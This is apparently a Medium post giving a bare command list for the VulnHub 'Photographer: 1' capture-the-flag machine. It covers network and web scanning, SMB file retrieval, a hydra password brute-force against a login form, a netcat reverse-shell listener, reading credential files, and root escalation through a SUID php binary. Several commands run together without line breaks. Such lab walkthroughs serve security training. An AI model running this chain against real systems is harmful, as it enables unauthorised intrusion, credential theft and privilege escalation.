VulnHub: Photographer: 1

nmap -sn 10.0.2.27/24
nmap -Pn 10.0.2.47nmap -Pn -p1000- 10.0.2.47
nmap -A -p80,139,445,8000 10.0.2.47
nikto -h http://10.0.2.47
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.47/ -x php,txt,html,sh,cgi,bak -qgobuster dir --wordlist /usr/share/dirb/wordlists/big.txt -u http://10.0.2.47/ -x php,txt,html,sh,cgi,bak -qgobuster dir --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -u http://10.0.2.47/ -x php,txt,html,sh,cgi,bak -q
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.0.2.47
smbclient //10.0.2.47/sambasharedirget mailsent.txtget wordpress.bkp.zipexit
cat mailsent.txt
unzip wordpress.bkp.zipls -lacd wordpressls -lacat wp-config-sample.php
hydra -L mail.txt -P ~/Desktop/rockyou.txt 10.0.2.47 -s 8000 http-post-form "/api.php?/sessions:email=^USER^&password=^PASS^:F=Incorrect. Try again or reset your password." -V -F -u
rlwrap nc -lvp 443
python -c 'import pty;pty.spawn("/bin/bash");'
cat /var/www/htmk/koken/storage/configuration/database.php
cat /home/daisa/user.txt
find / -perm -u=s -type f 2>/dev/null
CMD="/bin/sh"/usr/bin/php7.2 -r "pcntl_exec('/bin/sh', ['-p']);"whoami

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store